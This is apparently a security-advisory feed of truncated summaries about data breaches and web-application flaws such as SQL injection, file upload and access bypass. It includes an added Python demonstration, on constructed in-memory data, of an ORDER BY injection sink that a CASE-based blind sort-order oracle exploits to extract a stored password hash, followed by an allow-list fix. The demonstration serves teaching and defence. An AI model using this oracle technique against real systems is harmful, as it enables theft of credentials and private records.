European Commission Cyber-Attack Response
On 30 January, the European Commission's central infrastructure for managing mobile devices identified traces of a cyber-attack, which may have resulted in access to the names and mobile numbers of some staff members. The Commission's swift response ensured the incident was contained and the...
CVE-2025-68660 Discourse AI Discover's continue conversation allows threat actor to impersonate user
Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, an endpoint lets any authenticated user bypass the aidiscoverpersona access controls and gain ongoing DM access to personas that may be wired to staff-only categories, RAG document set...
CVE-2023-4558
A vulnerability classified as critical was found in SourceCodester Inventory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file staffdata.php. The manipulation of the argument columns0data leads to SQL injection. The attack can be launched remotely. The...
PT-2023-29578 · Unknown · Sourcecodester Inventory Management System
Name of the Vulnerable Software and Affected Versions: SourceCodester Inventory Management System version 1.0 Description: A critical vulnerability was found in the SourceCodester Inventory Management System. The issue affects an unknown functionality of the file staff data.php. The manipulation ...
Inventory Management System SQL Injection Vulnerability
Inventory Management System is an inventory management system written by the individual developer stemword. Inventory Management System version 1.0 suffers from a SQL injection vulnerability caused by the parameter columns0data in the file staffdata.php, which can lead to SQL injection...
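The three SourceCodester entries above describe one bug: a column parameter (shown here as columns0data in staffdata.php) spliced into a SQL statement. The script below is an added illustration, not the project's code, and the table, the stored hash and the query shape are constructed. It assumes, as is typical for DataTables-style column parameters, that the value lands in an ORDER BY clause, the one place a bound parameter cannot help because identifiers are not parameters. It also shows why such a sink is serious even when only one statement can run: the sort order becomes a boolean oracle that leaks data from another table character by character, and the fix is an allow-list of column names, not quoting.

```python
import sqlite3

# Constructed sample data standing in for a staff table and a users table.
SAMPLE_STAFF = [
    (1, "alice", "Warehouse"),
    (2, "bob", "Sales"),
    (3, "carol", "Purchasing"),
]
SAMPLE_ADMIN_HASH = "deadbeef"  # constructed secret the attacker wants to read

# Allow-list: the only identifiers the application may ever sort by.
ALLOWED_SORT_COLUMNS = {"id", "name", "department"}


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE staff (id INTEGER PRIMARY KEY, name TEXT, department TEXT)")
    conn.executemany("INSERT INTO staff VALUES (?, ?, ?)", SAMPLE_STAFF)
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", SAMPLE_ADMIN_HASH))
    return conn


def list_staff_vulnerable(conn, sort_column):
    """Vulnerable pattern: the request-controlled column name is concatenated
    into ORDER BY. A placeholder cannot hold an identifier, so developers
    concatenate here, and attacker input reaches the SQL parser unchecked."""
    sql = f"SELECT id, name, department FROM staff ORDER BY {sort_column}"
    return conn.execute(sql).fetchall()


def blind_oracle(conn, condition_sql):
    """Turn the ORDER BY sink into a yes/no oracle: sort ascending by id when
    the condition holds, descending otherwise, then look at the first row."""
    payload = f"(CASE WHEN ({condition_sql}) THEN id ELSE -id END)"
    rows = list_staff_vulnerable(conn, payload)
    return rows[0][0] == 1  # alice first means the condition was true


def extract_hash_prefix(conn, length):
    """Recover the first `length` hex characters of admin's password_hash
    using only the sort-order oracle, one position at a time."""
    found = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            cond = (
                f"(SELECT substr(password_hash, {pos}, 1) FROM users "
                f"WHERE username = 'admin') = '{ch}'"
            )
            if blind_oracle(conn, cond):
                found += ch
                break
    return found


def list_staff_hardened(conn, sort_column):
    """Hardened pattern: accept only a known identifier, then build the
    statement from the allow-listed value rather than from the request."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    sql = f'SELECT id, name, department FROM staff ORDER BY "{sort_column}"'
    return conn.execute(sql).fetchall()


def hardened_rejects(conn, sort_column):
    """True if the hardened query refuses the given column value."""
    try:
        list_staff_hardened(conn, sort_column)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legit sort:", list_staff_vulnerable(db, "name"))
    print("leaked hash prefix:", extract_hash_prefix(db, len(SAMPLE_ADMIN_HASH)))
    print("hardened rejects payload:", hardened_rejects(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

The oracle needs no stacked queries, no error messages and no UNION; a different row order is enough, which is why "the database driver only runs one statement" is not a mitigation for an identifier sink. Escaping or double-quoting the value is not one either, because the attacker's payload is a valid expression, not a string; only restricting the value to a fixed set of column names removes the sink.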
PT-2023-24393 · Dolibarr · Dolibarr
Name of the Vulnerable Software and Affected Versions: Dolibarr versions 16.0.0 through 16.0.4 Description: An issue in Dolibarr allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact fil...
CVE-2022-32119
Arox School ERP Pro v1.0 was discovered to contain multiple arbitrary file upload vulnerabilities via the Add Photo function at photogalleries.inc.php and the import staff excel function at 1financemaster.inc.php...
Unauthorized Access Vulnerability in Kaixin File System Profile 30.0
Kaixin File System Profile 30.0 is a system for managing employee files, contracts, training, personnel, attendance, payroll and other information within an organization. Kaixin File System Profile 30.0 suffers from an unauthorized access vulnerability that can be exploited by attackers to view...
CVE-2019-6126
The Admin Panel of PHP Scripts Mall Advance Peer to Peer MLM Script v1.7.0 allows remote attackers to bypass intended access restrictions by directly navigating to admin/dashboard.php or admin/user.php, as demonstrated by disclosure of information about users and staff...
iScripts AutoHoster - checktransferstatusbck.php SQL Injection
iScripts AutoHoster - checktransferstatusbck.php SQL Injection source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to...